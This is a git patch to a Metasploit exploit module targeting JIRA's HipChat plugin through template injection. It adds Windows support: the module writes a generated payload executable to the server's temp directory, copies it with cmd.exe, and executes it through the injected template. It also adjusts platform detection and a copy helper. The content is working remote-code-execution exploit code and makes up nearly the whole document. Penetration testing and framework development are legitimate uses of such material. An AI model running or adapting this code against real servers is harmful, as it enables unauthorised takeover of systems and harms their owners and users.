From f33e63c16f78f990d41bd76677b2a76de754ea3f Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Thu, 3 Dec 2015 14:02:32 -0600
Subject: [PATCH] Support Win/Linx/Java payloads for Win/Linux platforms

---
 .../unix/webapp/jira_hipchat_template.rb      | 50 +++++++++++++++----
 1 file changed, 41 insertions(+), 9 deletions(-)

diff --git a/modules/exploits/unix/webapp/jira_hipchat_template.rb b/modules/exploits/unix/webapp/jira_hipchat_template.rb
index 2779873e3f..93c883b949 100644
--- a/modules/exploits/unix/webapp/jira_hipchat_template.rb
+++ b/modules/exploits/unix/webapp/jira_hipchat_template.rb
@@ -89,7 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote
   def do_explicit_check
     begin
       cookie = do_login
-      # I don't really care which command to execute, as long as it's a valid one.
+      # I don't really care which command to execute, as long as it's a valid one for both platforms.
       # If the command is valid, it should return {"message"=>"0"}.
       # If the command is not valid, it should return an empty hash.
       c = get_exec_code('whoami')
@@ -382,7 +382,13 @@ class Metasploit3 < Msf::Exploit::Remote
   # @param new_fname [String] The new file
   # @return [String]
   def get_dup_file_code(fname, new_fname)
-    get_exec_code("cp #{fname} #{new_fname}")
+    if fname =~ /^\/[[:print:]]+/
+      cp_cmd = "cp #{fname} #{new_fname}"
+    else
+      cp_cmd = "cmd.exe /C copy #{fname} #{new_fname}"
+    end
+
+    get_exec_code(cp_cmd)
   end
 
 
@@ -431,7 +437,13 @@ class Metasploit3 < Msf::Exploit::Remote
 
 
   def target_platform_compat?(target_platform)
-    target.platform.names.grep(/#{target_platform}|java/i).empty? ? false : true
+    target.platform.names.each do |n|
+      if /^java$/i === n || /#{n}/i === target_platform
+        return true
+      end
+    end
+
+    false
   end
 
 
@@ -452,11 +464,7 @@ class Metasploit3 < Msf::Exploit::Remote
     c = get_temp_path_code
     res = inject_template(c, cookie)
     json = res.get_json_document
-    if json['message']
-      return json['message']
-    end
-
-    ''
+    json['message'] || ''
   end
 
   def get_java_home_path(cookie)
@@ -496,6 +504,30 @@ class Metasploit3 < Msf::Exploit::Remote
 
 
   def exploit_as_windows(cookie)
+    tmp_path = get_tmp_path(cookie)
+
+    if tmp_path.blank?
+      fail_with(Failure::Unknown, 'Unable to get the temp path.')
+    end
+
+    exe           = generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform)
+    exe_fname     = normalize_payload_fname(tmp_path,"#{Rex::Text.rand_text_alpha(5)}.exe")
+    exe_new_fname = normalize_payload_fname(tmp_path,"#{Rex::Text.rand_text_alpha(5)}.exe")
+    exe_fname.gsub!(/Program Files/, 'PROGRA~1')
+    exe_new_fname.gsub!(/Program Files/, 'PROGRA~1')
+    register_files_for_cleanup(exe_fname, exe_new_fname)
+
+    print_status("Attempting to write #{exe_fname}")
+    c = get_write_file_code(exe_fname, exe)
+    inject_template(c, cookie)
+
+    print_status("New file will be #{exe_new_fname}")
+    c = get_dup_file_code(exe_fname, exe_new_fname)
+    inject_template(c, cookie)
+
+    print_status("Executing #{exe_new_fname}")
+    c = get_exec_code(exe_new_fname)
+    inject_template(c, cookie)
   end
 
 
@@ -542,7 +574,7 @@ class Metasploit3 < Msf::Exploit::Remote
     print_status("Target being detected as: #{target_platform}")
 
     unless target_platform_compat?(target_platform)
-      fail_with(Failure::BadConfig, 'Selected target does not match the target.')
+      fail_with(Failure::BadConfig, 'Selected module target does not match the actual target.')
     end
 
     case target.name